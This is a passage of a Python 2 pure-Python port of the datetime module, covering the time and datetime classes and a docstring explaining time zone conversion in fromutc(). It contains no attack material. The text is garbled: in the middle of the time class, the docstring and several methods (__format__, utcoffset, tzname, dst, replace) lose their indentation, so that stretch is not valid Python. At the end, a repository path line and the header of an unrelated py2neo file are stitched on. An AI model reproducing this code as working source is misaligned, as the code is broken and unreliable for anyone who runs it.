        if state is None:
            return (self.__class__, args)
        else:
            return (self.__class__, args, state)

_tzinfo_class = tzinfo  # so functions w/ args named "tzinfo" can get at the class
class time(object):
"""Time with time zone.
Constructors:
__new__()
Operators:
__repr__, __str__
__cmp__, __hash__
Methods:
strftime()
isoformat()
utcoffset()
tzname()
dst()
Properties (readonly):
hour, minute, second, microsecond, tzinfo
"""
__slots__ = '_hour', '_minute', '_second', '_microsecond', '_tzinfo', '_hashcode'
    def __new__(cls, hour=0, minute=0, second=0, microsecond=0, tzinfo=None):
        """Constructor.

        Arguments:

        hour, minute (required)
        second, microsecond (default to zero)
        tzinfo (default to None)
        """
        # (Pickle-support fast path via a packed 6-byte string `hour` is
        # disabled in this port.)
        # if isinstance(hour, bytes) and len(hour) == 6 and ord(hour[0]) < 24:
        #     # Pickle support
        #     self = object.__new__(cls)
        #     self.__setstate(hour, minute or None)
        #     self._hashcode = -1
        #     return self
        hour, minute, second, microsecond = _check_time_fields(
            hour, minute, second, microsecond)
        _check_tzinfo_arg(tzinfo)
        self = object.__new__(cls)
        self._hour = hour
        self._minute = minute
        self._second = second
        self._microsecond = microsecond
        self._tzinfo = tzinfo
        self._hashcode = -1  # hash cache; -1 = not computed yet
        return self
    # Read-only field accessors
    @property
    def hour(self):
        """hour (0-23)"""
        return self._hour

    @property
    def minute(self):
        """minute (0-59)"""
        return self._minute

    @property
    def second(self):
        """second (0-59)"""
        return self._second

    @property
    def microsecond(self):
        """microsecond (0-999999)"""
        return self._microsecond

    @property
    def tzinfo(self):
        """timezone info object"""
        return self._tzinfo
    # Standard conversions, __hash__ (and helpers)

    # Comparisons of time objects with other.
    # Unlike date, non-time operands make __eq__/__ne__ return False/True
    # directly (no "timetuple" interception hook here).

    def __eq__(self, other):
        if isinstance(other, time):
            return self._cmp(other) == 0
        else:
            return False

    def __ne__(self, other):
        if isinstance(other, time):
            return self._cmp(other) != 0
        else:
            return True

    def __le__(self, other):
        if isinstance(other, time):
            return self._cmp(other) <= 0
        else:
            _cmperror(self, other)

    def __lt__(self, other):
        if isinstance(other, time):
            return self._cmp(other) < 0
        else:
            _cmperror(self, other)

    def __ge__(self, other):
        if isinstance(other, time):
            return self._cmp(other) >= 0
        else:
            _cmperror(self, other)

    def __gt__(self, other):
        if isinstance(other, time):
            return self._cmp(other) > 0
        else:
            _cmperror(self, other)

    def _cmp(self, other):
        """Three-way compare with another time, honoring UTC offsets."""
        assert isinstance(other, time)
        mytz = self._tzinfo
        ottz = other._tzinfo
        myoff = otoff = None

        # Identical tzinfo objects (or both naive): compare wall-clock
        # fields directly; _utcoffset() yields minutes east (or None).
        if mytz is ottz:
            base_compare = True
        else:
            myoff = self._utcoffset()
            otoff = other._utcoffset()
            base_compare = myoff == otoff

        if base_compare:
            return _cmp((self._hour, self._minute, self._second,
                         self._microsecond),
                        (other._hour, other._minute, other._second,
                         other._microsecond))
        # Mixed naive/aware comparison is an error.
        if myoff is None or otoff is None:
            raise TypeError("can't compare offset-naive and offset-aware times")
        # Different offsets: compare after converting hours+minutes to UTC.
        myhhmm = self._hour * 60 + self._minute - myoff
        othhmm = other._hour * 60 + other._minute - otoff
        return _cmp((myhhmm, self._second, self._microsecond),
                    (othhmm, other._second, other._microsecond))
    def __hash__(self):
        """Hash, cached in _hashcode; aware times hash on their UTC value."""
        if self._hashcode == -1:
            tzoff = self._utcoffset()
            if not tzoff:  # zero or None
                self._hashcode = hash(self._getstate()[0])
            else:
                # Convert to UTC minutes so equal aware times hash equal.
                h, m = divmod(self.hour * 60 + self.minute - tzoff, 60)
                if 0 <= h < 24:
                    self._hashcode = hash(time(h, m, self.second, self.microsecond))
                else:
                    # UTC value rolls past midnight; hash the raw tuple.
                    self._hashcode = hash((h, m, self.second, self.microsecond))
        return self._hashcode
    # Conversion to string

    def _tzstr(self, sep=":"):
        """Return formatted timezone offset (+xx:xx) or None."""
        off = self._utcoffset()
        if off is not None:
            if off < 0:
                sign = "-"
                off = -off
            else:
                sign = "+"
            hh, mm = divmod(off, 60)
            assert 0 <= hh < 24
            off = "%s%02d%s%02d" % (sign, hh, sep, mm)
        return off

    def __repr__(self):
        """Convert to formal string, for repr()."""
        # Trailing zero fields are omitted, shortest form wins.
        if self._microsecond != 0:
            s = ", %d, %d" % (self._second, self._microsecond)
        elif self._second != 0:
            s = ", %d" % self._second
        else:
            s = ""
        module = "datetime." if self.__class__ is time else ""
        s= "%s(%d, %d%s)" % (module + self.__class__.__name__,
                             self._hour, self._minute, s)
        if self._tzinfo is not None:
            assert s[-1:] == ")"
            s = s[:-1] + ", tzinfo=%r" % self._tzinfo + ")"
        return s

    def isoformat(self):
        """Return the time formatted according to ISO.

        This is 'HH:MM:SS.mmmmmm+zz:zz', or 'HH:MM:SS+zz:zz' if
        self.microsecond == 0.
        """
        s = _format_time(self._hour, self._minute, self._second,
                         self._microsecond)
        tz = self._tzstr()
        if tz:
            s += tz
        return s

    __str__ = isoformat
# def strftime(self, format):
# """Format using strftime(). The date part of the timestamp passed
# to underlying strftime should not be used.
# """
# # The year must be >= _MINYEARFMT else Python's strftime implementation
# # can raise a bogus exception.
# timetuple = (1900, 1, 1,
# self._hour, self._minute, self._second,
# 0, 1, -1)
# return _wrap_strftime(self, format, timetuple)
def __format__(self, fmt):
if not isinstance(fmt, (str, unicode)):
raise ValueError("__format__ expects str or unicode, not %s" %
fmt.__class__.__name__)
if len(fmt) != 0:
return self.strftime(fmt)
return str(self)
# Timezone functions
def utcoffset(self):
"""Return the timezone offset in minutes east of UTC (negative west of
UTC)."""
if self._tzinfo is None:
return None
offset = self._tzinfo.utcoffset(None)
offset = _check_utc_offset("utcoffset", offset)
if offset is not None:
offset = timedelta._create(0, offset * 60, 0, True)
return offset
# Return an integer (or None) instead of a timedelta (or None).
def _utcoffset(self):
if self._tzinfo is None:
return None
offset = self._tzinfo.utcoffset(None)
offset = _check_utc_offset("utcoffset", offset)
return offset
def tzname(self):
"""Return the timezone name.
Note that the name is 100% informational -- there's no requirement that
it mean anything in particular. For example, "GMT", "UTC", "-500",
"-5:00", "EDT", "US/Eastern", "America/New York" are all valid replies.
"""
if self._tzinfo is None:
return None
name = self._tzinfo.tzname(None)
_check_tzname(name)
return name
def dst(self):
"""Return 0 if DST is not in effect, or the DST offset (in minutes
eastward) if DST is in effect.
This is purely informational; the DST offset has already been added to
the UTC offset returned by utcoffset() if applicable, so there's no
need to consult dst() unless you're interested in displaying the DST
info.
"""
if self._tzinfo is None:
return None
offset = self._tzinfo.dst(None)
offset = _check_utc_offset("dst", offset)
if offset is not None:
offset = timedelta._create(0, offset * 60, 0, True)
return offset
# Return an integer (or None) instead of a timedelta (or None).
def _dst(self):
if self._tzinfo is None:
return None
offset = self._tzinfo.dst(None)
offset = _check_utc_offset("dst", offset)
return offset
def replace(self, hour=None, minute=None, second=None, microsecond=None,
tzinfo=True):
"""Return a new time with new values for the specified fields."""
if hour is None:
hour = self.hour
if minute is None:
minute = self.minute
if second is None:
second = self.second
if microsecond is None:
microsecond = self.microsecond
if tzinfo is True:
tzinfo = self.tzinfo
return time.__new__(type(self),
hour, minute, second, microsecond, tzinfo)
def __nonzero__(self):
if self.second or self.microsecond:
return True
offset = self._utcoffset() or 0
return self.hour * 60 + self.minute != offset
    # Pickle support.
    def _getstate(self):
        """Return the pickle state: a 6-byte string packing hour, minute,
        second and a 3-byte big-endian microsecond count, plus the tzinfo
        object when one is attached."""
        us2, us3 = divmod(self._microsecond, 256)
        us1, us2 = divmod(us2, 256)
        basestate = _struct.pack('6B', self._hour, self._minute, self._second,
                                 us1, us2, us3)
        if self._tzinfo is None:
            return (basestate,)
        else:
            return (basestate, self._tzinfo)
    def __setstate(self, string, tzinfo):
        # Inverse of _getstate(): unpack the 6-byte state string.
        # (Py2 pickles the state as a str, hence ord() on each byte.)
        if tzinfo is not None and not isinstance(tzinfo, _tzinfo_class):
            raise TypeError("bad tzinfo state arg")
        self._hour, self._minute, self._second, us1, us2, us3 = (
            ord(string[0]), ord(string[1]), ord(string[2]),
            ord(string[3]), ord(string[4]), ord(string[5]))
        # Reassemble the 24-bit big-endian microsecond count.
        self._microsecond = (((us1 << 8) | us2) << 8) | us3
        self._tzinfo = tzinfo
def __reduce__(self):
return (time, self._getstate())
_time_class = time  # so functions w/ args named "time" can get at the class

# Class attributes required by the datetime API: earliest and latest
# representable times, and the smallest representable difference.
time.min = time(0, 0, 0)
time.max = time(23, 59, 59, 999999)
time.resolution = timedelta(microseconds=1)
class datetime(date):
    """datetime(year, month, day[, hour[, minute[, second[, microsecond[,tzinfo]]]]])

    The year, month and day arguments are required. tzinfo may be None, or an
    instance of a tzinfo subclass. The remaining arguments may be ints or longs.
    """
    # A datetime carries both date and time state in a single object.
    __slots__ = date.__slots__ + time.__slots__

    def __new__(cls, year, month=None, day=None, hour=0, minute=0, second=0,
                microsecond=0, tzinfo=None):
        # if isinstance(year, bytes) and len(year) == 10 and \
        # 1 <= ord(year[2]) <= 12:
        # # Pickle support
        # self = object.__new__(cls)
        # self.__setstate(year, month)
        # self._hashcode = -1
        # return self
        # The _check_* helpers raise TypeError/ValueError on bad input and
        # hand back normalized integer field values.
        year, month, day = _check_date_fields(year, month, day)
        hour, minute, second, microsecond = _check_time_fields(
            hour, minute, second, microsecond)
        _check_tzinfo_arg(tzinfo)
        self = object.__new__(cls)
        self._year = year
        self._month = month
        self._day = day
        self._hour = hour
        self._minute = minute
        self._second = second
        self._microsecond = microsecond
        self._tzinfo = tzinfo
        self._hashcode = -1  # lazy hash cache; -1 means "not computed yet"
        return self

    # Read-only field accessors
    @property
    def hour(self):
        """hour (0-23)"""
        return self._hour

    @property
    def minute(self):
        """minute (0-59)"""
        return self._minute

    @property
    def second(self):
        """second (0-59)"""
        return self._second

    @property
    def microsecond(self):
        """microsecond (0-999999)"""
        return self._microsecond

    @property
    def tzinfo(self):
        """timezone info object"""
        return self._tzinfo

    @classmethod
    def fromtimestamp(cls, timestamp, tz=None):
        """Construct a datetime from a POSIX timestamp (like time.time()).

        A timezone info object may be passed in as well.
        """
        _check_tzinfo_arg(tz)
        # With an explicit tz, convert in UTC first and let tz.fromutc()
        # map the result into that zone's local time; otherwise use the
        # platform's local time directly.
        converter = _time.localtime if tz is None else _time.gmtime
        self = cls._from_timestamp(converter, timestamp, tz)
        if tz is not None:
            self = tz.fromutc(self)
        return self

    @classmethod
    def utcfromtimestamp(cls, t):
        "Construct a UTC datetime from a POSIX timestamp (like time.time())."
        return cls._from_timestamp(_time.gmtime, t, None)

    @classmethod
    def _from_timestamp(cls, converter, timestamp, tzinfo):
        # Split the timestamp into whole seconds plus rounded microseconds.
        t_full = timestamp
        timestamp = int(_math.floor(timestamp))
        frac = t_full - timestamp
        us = _round(frac * 1e6)
        # If timestamp is less than one microsecond smaller than a
        # full second, us can be rounded up to 1000000. In this case,
        # roll over to seconds, otherwise, ValueError is raised
        # by the constructor.
        if us == 1000000:
            timestamp += 1
            us = 0
        y, m, d, hh, mm, ss, weekday, jday, dst = converter(timestamp)
        ss = min(ss, 59)  # clamp out leap seconds if the platform has them
        return cls(y, m, d, hh, mm, ss, us, tzinfo)

    @classmethod
    def now(cls, tz=None):
        "Construct a datetime from time.time() and optional time zone info."
        t = _time.time()
        return cls.fromtimestamp(t, tz)

    @classmethod
    def utcnow(cls):
        "Construct a UTC datetime from time.time()."
        t = _time.time()
        return cls.utcfromtimestamp(t)

    @classmethod
    def combine(cls, date, time):
        "Construct a datetime from a given date and a given time."
        if not isinstance(date, _date_class):
            raise TypeError("date argument must be a date instance")
        if not isinstance(time, _time_class):
            raise TypeError("time argument must be a time instance")
        return cls(date.year, date.month, date.day,
                   time.hour, time.minute, time.second, time.microsecond,
                   time.tzinfo)

    def timetuple(self):
        "Return local time tuple compatible with time.localtime()."
        # struct_time's tm_isdst flag: -1 unknown, 0 off, 1 on.
        dst = self._dst()
        if dst is None:
            dst = -1
        elif dst:
            dst = 1
        return _build_struct_time(self.year, self.month, self.day,
                                  self.hour, self.minute, self.second,
                                  dst)

    def utctimetuple(self):
        "Return UTC time tuple compatible with time.gmtime()."
        y, m, d = self.year, self.month, self.day
        hh, mm, ss = self.hour, self.minute, self.second
        offset = self._utcoffset()
        if offset:  # neither None nor 0
            # Subtract the offset (minutes) then renormalize all fields;
            # overflow past the year range is deliberately ignored here.
            mm -= offset
            y, m, d, hh, mm, ss, _ = _normalize_datetime(
                y, m, d, hh, mm, ss, 0, ignore_overflow=True)
        return _build_struct_time(y, m, d, hh, mm, ss, 0)

    def date(self):
        "Return the date part."
        return date(self._year, self._month, self._day)

    def time(self):
        "Return the time part, with tzinfo None."
        return time(self.hour, self.minute, self.second, self.microsecond)

    def timetz(self):
        "Return the time part, with same tzinfo."
        return time(self.hour, self.minute, self.second, self.microsecond,
                    self._tzinfo)

    def replace(self, year=None, month=None, day=None, hour=None,
                minute=None, second=None, microsecond=None, tzinfo=True):
        """Return a new datetime with new values for the specified fields."""
        # tzinfo's sentinel is True rather than None, because tzinfo=None
        # is the documented way to produce a naive copy.
        if year is None:
            year = self.year
        if month is None:
            month = self.month
        if day is None:
            day = self.day
        if hour is None:
            hour = self.hour
        if minute is None:
            minute = self.minute
        if second is None:
            second = self.second
        if microsecond is None:
            microsecond = self.microsecond
        if tzinfo is True:
            tzinfo = self.tzinfo
        return datetime.__new__(type(self),
                                year, month, day, hour, minute, second,
                                microsecond, tzinfo)

    def astimezone(self, tz):
        """Convert this aware datetime to time zone *tz*."""
        if not isinstance(tz, tzinfo):
            raise TypeError("tz argument must be an instance of tzinfo")
        mytz = self.tzinfo
        if mytz is None:
            raise ValueError("astimezone() requires an aware datetime")
        if tz is mytz:
            return self
        # Convert self to UTC, and attach the new time zone object.
        myoffset = self.utcoffset()
        if myoffset is None:
            raise ValueError("astimezone() requires an aware datetime")
        utc = (self - myoffset).replace(tzinfo=tz)
        # Convert from UTC to tz's local time.
        return tz.fromutc(utc)

    # Ways to produce a string.
    def ctime(self):
        "Return ctime() style string."
        # toordinal() % 7 gives a 0..6 weekday; `or 7` maps 0 to 7 so the
        # value indexes _DAYNAMES, whose slot 0 is unused.
        weekday = self.toordinal() % 7 or 7
        return "%s %s %2d %02d:%02d:%02d %04d" % (
            _DAYNAMES[weekday],
            _MONTHNAMES[self._month],
            self._day,
            self._hour, self._minute, self._second,
            self._year)

    def isoformat(self, sep='T'):
        """Return the time formatted according to ISO.

        This is 'YYYY-MM-DD HH:MM:SS.mmmmmm', or 'YYYY-MM-DD HH:MM:SS' if
        self.microsecond == 0.

        If self.tzinfo is not None, the UTC offset is also attached, giving
        'YYYY-MM-DD HH:MM:SS.mmmmmm+HH:MM' or 'YYYY-MM-DD HH:MM:SS+HH:MM'.

        Optional argument sep specifies the separator between date and
        time, default 'T'.
        """
        s = ("%04d-%02d-%02d%c" % (self._year, self._month, self._day, sep) +
             _format_time(self._hour, self._minute, self._second,
                          self._microsecond))
        off = self._utcoffset()
        if off is not None:
            if off < 0:
                sign = "-"
                off = -off
            else:
                sign = "+"
            hh, mm = divmod(off, 60)
            s += "%s%02d:%02d" % (sign, hh, mm)
        return s

    def __repr__(self):
        """Convert to formal string, for repr()."""
        L = [self._year, self._month, self._day,  # These are never zero
             self._hour, self._minute, self._second, self._microsecond]
        # Drop a trailing zero microsecond field, then a trailing zero
        # second field (two separate checks, since at most two trailing
        # fields may be omitted from the repr).
        if L[-1] == 0:
            del L[-1]
        if L[-1] == 0:
            del L[-1]
        s = ", ".join(map(str, L))
        module = "datetime." if self.__class__ is datetime else ""
        s = "%s(%s)" % (module + self.__class__.__name__, s)
        if self._tzinfo is not None:
            assert s[-1:] == ")"
            s = s[:-1] + ", tzinfo=%r" % self._tzinfo + ")"
        return s

    def __str__(self):
        "Convert to string, for str()."
        return self.isoformat(sep=' ')

    # @classmethod
    # def strptime(cls, date_string, format):
    # 'string, format -> new datetime parsed from a string (like time.strptime()).'
    # from _strptime import _strptime
    # # _strptime._strptime returns a two-element tuple. The first
    # # element is a time.struct_time object. The second is the
    # # microseconds (which are not defined for time.struct_time).
    # struct, micros = _strptime(date_string, format)
    # return cls(*(struct[0:6] + (micros,)))

    def utcoffset(self):
        """Return the timezone offset in minutes east of UTC (negative west of
        UTC)."""
        if self._tzinfo is None:
            return None
        offset = self._tzinfo.utcoffset(self)
        offset = _check_utc_offset("utcoffset", offset)
        if offset is not None:
            offset = timedelta._create(0, offset * 60, 0, True)
        return offset

    # Return an integer (or None) instead of a timedelta (or None).
    def _utcoffset(self):
        if self._tzinfo is None:
            return None
        offset = self._tzinfo.utcoffset(self)
        offset = _check_utc_offset("utcoffset", offset)
        return offset

    def tzname(self):
        """Return the timezone name.

        Note that the name is 100% informational -- there's no requirement that
        it mean anything in particular. For example, "GMT", "UTC", "-500",
        "-5:00", "EDT", "US/Eastern", "America/New York" are all valid replies.
        """
        if self._tzinfo is None:
            return None
        name = self._tzinfo.tzname(self)
        _check_tzname(name)
        return name

    def dst(self):
        """Return 0 if DST is not in effect, or the DST offset (in minutes
        eastward) if DST is in effect.

        This is purely informational; the DST offset has already been added to
        the UTC offset returned by utcoffset() if applicable, so there's no
        need to consult dst() unless you're interested in displaying the DST
        info.
        """
        if self._tzinfo is None:
            return None
        offset = self._tzinfo.dst(self)
        offset = _check_utc_offset("dst", offset)
        if offset is not None:
            offset = timedelta._create(0, offset * 60, 0, True)
        return offset

    # Return an integer (or None) instead of a timedelta (or None).
    def _dst(self):
        if self._tzinfo is None:
            return None
        offset = self._tzinfo.dst(self)
        offset = _check_utc_offset("dst", offset)
        return offset

    # Comparisons of datetime objects with other.
    # NOTE: a non-datetime operand exposing a timetuple attribute gets
    # NotImplemented back, giving its reflected comparison a chance.
    def __eq__(self, other):
        if isinstance(other, datetime):
            return self._cmp(other) == 0
        elif hasattr(other, "timetuple") and not isinstance(other, date):
            return NotImplemented
        else:
            return False

    def __ne__(self, other):
        if isinstance(other, datetime):
            return self._cmp(other) != 0
        elif hasattr(other, "timetuple") and not isinstance(other, date):
            return NotImplemented
        else:
            return True

    def __le__(self, other):
        if isinstance(other, datetime):
            return self._cmp(other) <= 0
        elif hasattr(other, "timetuple") and not isinstance(other, date):
            return NotImplemented
        else:
            _cmperror(self, other)

    def __lt__(self, other):
        if isinstance(other, datetime):
            return self._cmp(other) < 0
        elif hasattr(other, "timetuple") and not isinstance(other, date):
            return NotImplemented
        else:
            _cmperror(self, other)

    def __ge__(self, other):
        if isinstance(other, datetime):
            return self._cmp(other) >= 0
        elif hasattr(other, "timetuple") and not isinstance(other, date):
            return NotImplemented
        else:
            _cmperror(self, other)

    def __gt__(self, other):
        if isinstance(other, datetime):
            return self._cmp(other) > 0
        elif hasattr(other, "timetuple") and not isinstance(other, date):
            return NotImplemented
        else:
            _cmperror(self, other)

    def _cmp(self, other):
        # Three-way compare returning -1/0/1; helper for the rich
        # comparison operators above.
        assert isinstance(other, datetime)
        mytz = self._tzinfo
        ottz = other._tzinfo
        myoff = otoff = None
        if mytz is ottz:
            base_compare = True
        else:
            if mytz is not None:
                myoff = self._utcoffset()
            if ottz is not None:
                otoff = other._utcoffset()
            # Equal offsets (including both None) allow a plain
            # field-by-field comparison.
            base_compare = myoff == otoff
        if base_compare:
            return _cmp((self._year, self._month, self._day,
                         self._hour, self._minute, self._second,
                         self._microsecond),
                        (other._year, other._month, other._day,
                         other._hour, other._minute, other._second,
                         other._microsecond))
        if myoff is None or otoff is None:
            raise TypeError("can't compare offset-naive and offset-aware datetimes")
        # XXX What follows could be done more efficiently...
        diff = self - other  # this will take offsets into account
        if diff.days < 0:
            return -1
        return diff and 1 or 0

    def _add_timedelta(self, other, factor):
        # Shared implementation of datetime +/- timedelta; factor is +1
        # for addition, -1 for subtraction.
        y, m, d, hh, mm, ss, us = _normalize_datetime(
            self._year,
            self._month,
            self._day + other.days * factor,
            self._hour,
            self._minute,
            self._second + other.seconds * factor,
            self._microsecond + other.microseconds * factor)
        return datetime(y, m, d, hh, mm, ss, us, tzinfo=self._tzinfo)

    def __add__(self, other):
        "Add a datetime and a timedelta."
        if not isinstance(other, timedelta):
            return NotImplemented
        return self._add_timedelta(other, 1)

    __radd__ = __add__

    def __sub__(self, other):
        "Subtract two datetimes, or a datetime and a timedelta."
        if not isinstance(other, datetime):
            if isinstance(other, timedelta):
                return self._add_timedelta(other, -1)
            return NotImplemented
        # Difference of the wall-clock fields first...
        delta_d = self.toordinal() - other.toordinal()
        delta_s = (self._hour - other._hour) * 3600 + \
                  (self._minute - other._minute) * 60 + \
                  (self._second - other._second)
        delta_us = self._microsecond - other._microsecond
        base = timedelta._create(delta_d, delta_s, delta_us, True)
        if self._tzinfo is other._tzinfo:
            return base
        myoff = self._utcoffset()
        otoff = other._utcoffset()
        if myoff == otoff:
            return base
        if myoff is None or otoff is None:
            raise TypeError("can't subtract offset-naive and offset-aware datetimes")
        # ...then correct for the differing UTC offsets (in minutes).
        return base + timedelta(minutes = otoff-myoff)

    def __hash__(self):
        # Computed lazily and cached in _hashcode; -1 means "not yet".
        if self._hashcode == -1:
            tzoff = self._utcoffset()
            if tzoff is None:
                # Naive datetimes hash on the packed byte state.
                self._hashcode = hash(self._getstate()[0])
            else:
                # Aware datetimes hash on their UTC-normalized value so
                # equal instants in different zones hash alike.
                days = _ymd2ord(self.year, self.month, self.day)
                seconds = self.hour * 3600 + (self.minute - tzoff) * 60 + self.second
                self._hashcode = hash(timedelta(days, seconds, self.microsecond))
        return self._hashcode

    # Pickle support.
    def _getstate(self):
        # Pack year (2 bytes), month, day, hour, minute, second and a
        # 3-byte big-endian microsecond count; append tzinfo when aware.
        yhi, ylo = divmod(self._year, 256)
        us2, us3 = divmod(self._microsecond, 256)
        us1, us2 = divmod(us2, 256)
        basestate = _struct.pack('10B', yhi, ylo, self._month, self._day,
                                 self._hour, self._minute, self._second,
                                 us1, us2, us3)
        if self._tzinfo is None:
            return (basestate,)
        else:
            return (basestate, self._tzinfo)

    def __setstate(self, string, tzinfo):
        # Inverse of _getstate(); Py2 pickles the state as a str, hence
        # ord() on each byte.
        if tzinfo is not None and not isinstance(tzinfo, _tzinfo_class):
            raise TypeError("bad tzinfo state arg")
        (yhi, ylo, self._month, self._day, self._hour,
         self._minute, self._second, us1, us2, us3) = (ord(string[0]),
            ord(string[1]), ord(string[2]), ord(string[3]),
            ord(string[4]), ord(string[5]), ord(string[6]),
            ord(string[7]), ord(string[8]), ord(string[9]))
        self._year = yhi * 256 + ylo
        self._microsecond = (((us1 << 8) | us2) << 8) | us3
        self._tzinfo = tzinfo

    def __reduce__(self):
        return (self.__class__, self._getstate())
# Class attributes required by the datetime API: earliest and latest
# representable datetimes, and the smallest representable difference.
datetime.min = datetime(1, 1, 1)
datetime.max = datetime(9999, 12, 31, 23, 59, 59, 999999)
datetime.resolution = timedelta(microseconds=1)
def _isoweek1monday(year):
    """Return the ordinal of the Monday starting ISO week 1 of *year*
    (the week that contains the year's first Thursday)."""
    # XXX This could be done more efficiently
    THURSDAY = 3
    first_day = _ymd2ord(year, 1, 1)
    first_weekday = (first_day + 6) % 7  # See weekday() above
    monday = first_day - first_weekday
    if first_weekday > THURSDAY:
        monday += 7
    return monday
"""
Some time zone algebra. For a datetime x, let
x.n = x stripped of its timezone -- its naive time.
x.o = x.utcoffset(), and assuming that doesn't raise an exception or
return None
x.d = x.dst(), and assuming that doesn't raise an exception or
return None
x.s = x's standard offset, x.o - x.d
Now some derived rules, where k is a duration (timedelta).
1. x.o = x.s + x.d
This follows from the definition of x.s.
2. If x and y have the same tzinfo member, x.s = y.s.
This is actually a requirement, an assumption we need to make about
sane tzinfo classes.
3. The naive UTC time corresponding to x is x.n - x.o.
This is again a requirement for a sane tzinfo class.
4. (x+k).s = x.s
This follows from #2, and that datetimetz+timedelta preserves tzinfo.
5. (x+k).n = x.n + k
Again follows from how arithmetic is defined.
Now we can explain tz.fromutc(x). Let's assume it's an interesting case
(meaning that the various tzinfo methods exist, and don't blow up or return
None when called).
The function wants to return a datetime y with timezone tz, equivalent to x.
x is already in UTC.
By #3, we want
y.n - y.o = x.n [1]
The algorithm starts by attaching tz to x.n, and calling that y. So
x.n = y.n at the start. Then it wants to add a duration k to y, so that [1]
becomes true; in effect, we want to solve [2] for k:
(y+k).n - (y+k).o = x.n [2]
By #1, this is the same as
(y+k).n - ((y+k).s + (y+k).d) = x.n [3]
By #5, (y+k).n = y.n + k, which equals x.n + k because x.n=y.n at the start.
Substituting that into [3],
x.n + k - (y+k).s - (y+k).d = x.n; the x.n terms cancel, leaving
k - (y+k).s - (y+k).d = 0; rearranging,
k = (y+k).s - (y+k).d; by #4, (y+k).s == y.s, so
k = y.s - (y+k).d
On the RHS, (y+k).d can't be computed directly, but y.s can be, and we
approximate k by ignoring the (y+k).d term at first. Note that k can't be
very large, since all offset-returning methods return a duration of magnitude
less than 24 hours. For that reason, if y is firmly in std time, (y+k).d must
be 0, so ignoring it has no consequence then.
In any case, the new value is
z = y + y.s [4]
It's helpful to step back at look at [4] from a higher level: it's simply
mapping from UTC to tz's standard time.
At this point, if
z.n - z.o = x.n [5]
we have an equivalent time, and are almost done. The insecurity here is
at the start of daylight time. Picture US Eastern for concreteness. The wall
time jumps from 1:59 to 3:00, and wall hours of the form 2:MM don't make good
sense then. The docs ask that an Eastern tzinfo class consider such a time to
be EDT (because it's "after 2"), which is a redundant spelling of 1:MM EST
on the day DST starts. We want to return the 1:MM EST spelling because that's
the only spelling that makes sense on the local wall clock.
In fact, if [5] holds at this point, we do have the standard-time spelling,
but that takes a bit of proof. We first prove a stronger result. What's the
difference between the LHS and RHS of [5]? Let
diff = x.n - (z.n - z.o) [6]
Now
z.n = by [4]
(y + y.s).n = by #5
y.n + y.s = since y.n = x.n
x.n + y.s = since z and y have the same tzinfo member,
y.s = z.s by #2
x.n + z.s
Plugging that back into [6] gives
diff =
x.n - ((x.n + z.s) - z.o) = expanding
x.n - x.n - z.s + z.o = cancelling
- z.s + z.o = by #2
z.d
So diff = z.d.
If [5] is true now, diff = 0, so z.d = 0 too, and we have the standard-time
spelling we wanted in the endcase described above. We're done. Contrarily,
if z.d = 0, then we have a UTC equivalent, and are also done.
If [5] is not true now, diff = z.d != 0, and z.d is the offset we need to
add to z (in effect, z is in tz's standard time, and we need to shift the
local clock into tz's daylight time).
Let
z' = z + z.d = z + diff [7]
and we can again ask whether
z'.n - z'.o = x.n [8]
If so, we're done. If not, the tzinfo class is insane, according to the
assumptions we've made. This also requires a bit of proof. As before, let's
compute the difference between the LHS and RHS of [8] (and skipping some of
the justifications for the kinds of substitutions we've done several times
already):
diff' = x.n - (z'.n - z'.o) = replacing z'.n via [7]
x.n - (z.n + diff - z'.o) = replacing diff via [6]
x.n - (z.n + x.n - (z.n - z.o) - z'.o) =
x.n - z.n - x.n + z.n - z.o + z'.o = cancel x.n
- z.n + z.n - z.o + z'.o = cancel z.n
- z.o + z'.o = #1 twice
-z.s - z.d + z'.s + z'.d = z and z' have same tzinfo
z'.d - z.d
So z' is UTC-equivalent to x iff z'.d = z.d at this point. If they are equal,
we've found the UTC-equivalent so are done. In fact, we stop with [7] and
return z', not bothering to compute z'.d.
How could z.d and z'.d differ? z' = z + z.d [7], so merely moving z' by
a dst() offset, and starting *from* a time already in DST (we know z.d != 0),
would have to change the result dst() returns: we start in DST, and moving
a little further into it takes us out of DST.
There isn't a sane case where this can happen. The closest it gets is at
the end of DST, where there's an hour in UTC with no spelling in a hybrid
tzinfo class. In US Eastern, that's 5:MM UTC = 0:MM EST = 1:MM EDT. During
that hour, on an Eastern clock 1:MM is taken as being in standard time (6:MM
UTC) because the docs insist on that, but 0:MM is taken as being in daylight
time (4:MM UTC). There is no local time mapping to 5:MM UTC. The local
clock jumps from 1:59 back to 1:00 again, and repeats the 1:MM hour in
standard time. Since that's what the local clock *does*, we want to map both
UTC hours 5:MM and 6:MM to 1:MM Eastern. The result is ambiguous
in local time, but so it goes -- it's the way the local clock works.
When x = 5:MM UTC is the input to this algorithm, x.o=0, y.o=-5 and y.d=0,
so z=0:MM. z.d=60 (minutes) then, so [5] doesn't hold and we keep going.
z' = z + z.d = 1:MM then, and z'.d=0, and z'.d - z.d = -60 != 0 so [8]
(correctly) concludes that z' is not UTC-equivalent to x.
Because we know z.d said z was in daylight time (else [5] would have held and
we would have stopped then), and we know z.d != z'.d (else [8] would have held
and we have stopped then), and there are only 2 possible values dst() can
return in Eastern, it follows that z'.d must be 0 (which it is in the example,
but the reasoning doesn't depend on the example -- it depends on there being
two possible dst() outcomes, one zero and the other non-zero). Therefore
z' must be in standard time, and is the spelling we want in this case.
Note again that z' is not UTC-equivalent as far as the hybrid tzinfo class is
concerned (because it takes z' as being in standard time rather than the
daylight time we intend here), but returning it gives the real-life "local
clock repeats an hour" behavior when mapping the "unspellable" UTC hour into
tz.
When the input is 6:MM, z=1:MM and z.d=0, and we stop at once, again with
the 1:MM standard time spelling we want.
So how can this break? One of the assumptions must be violated. Two
possibilities:
1) [2] effectively says that y.s is invariant across all y belong to a given
time zone. This isn't true if, for political reasons or continental drift,
a region decides to change its base offset from UTC.
2) There may be versions of "double daylight" time where the tail end of
the analysis gives up a step too early. I haven't thought about that
enough to say.
In any case, it's clear that the default fromutc() is strong enough to handle
"almost all" time zones: so long as the standard offset is invariant, it
doesn't matter if daylight time transition points change from year to year, or
if daylight time is skipped in some years; it doesn't matter how large or
small dst() may get within its bounds; and it doesn't even matter if some
perverse time zone returns a negative dst()). So a breaking case must be
pretty bizarre, and a tzinfo subclass can override fromutc() if it is.
"""
|
bestvibes/neo4j-social-network | refs/heads/master | env/lib/python2.7/site-packages/py2neo/packages/jsonstream/pyjsonstream.py | 4 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
